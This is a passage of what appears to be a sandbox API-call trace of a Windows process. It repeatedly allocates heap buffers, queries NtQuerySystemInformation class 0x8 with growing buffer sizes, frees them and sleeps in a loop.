SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0280.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0280.462] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.463] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0280.463] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.463] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.463] Sleep (dwMilliseconds=0x110) [0280.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0280.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0280.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0280.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0280.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0280.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0280.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0280.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0280.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.503] Sleep (dwMilliseconds=0x110) [0280.512] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0280.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.513] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0280.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0280.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0280.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0280.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0280.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0280.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0280.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.516] Sleep (dwMilliseconds=0x110) [0280.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0280.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0280.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0280.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0280.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0280.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0280.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0280.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0280.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.532] Sleep (dwMilliseconds=0x110) [0280.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0280.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0280.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0280.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0280.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0280.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0280.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0280.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0280.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.550] Sleep (dwMilliseconds=0x110) [0280.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0280.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0280.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0280.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0280.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0280.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0280.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0280.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0280.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.565] Sleep (dwMilliseconds=0x110) [0280.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0280.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0280.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0280.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0280.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0280.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0280.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0280.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0280.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.581] Sleep (dwMilliseconds=0x110) [0280.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0280.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0280.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0280.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0280.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0280.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0280.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0280.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0280.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.593] Sleep (dwMilliseconds=0x110) [0280.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0280.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0280.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0280.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0280.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0280.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0280.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0280.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0280.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.610] Sleep (dwMilliseconds=0x110) [0280.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0280.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0280.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0280.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0280.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0280.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0280.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0280.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0280.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.628] Sleep (dwMilliseconds=0x110) [0280.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0280.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0280.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0280.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0280.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0280.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0280.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0280.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0280.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.642] Sleep (dwMilliseconds=0x110) [0280.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0280.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0280.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0280.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0280.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0280.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0280.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0280.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0280.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.660] Sleep (dwMilliseconds=0x110) [0280.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0280.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0280.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0280.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0280.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0280.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0280.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0280.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0280.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.672] Sleep (dwMilliseconds=0x110) [0280.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0280.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0280.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0280.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0280.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0280.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0280.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0280.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0280.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.688] Sleep (dwMilliseconds=0x110) [0280.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0280.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0280.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0280.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0280.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 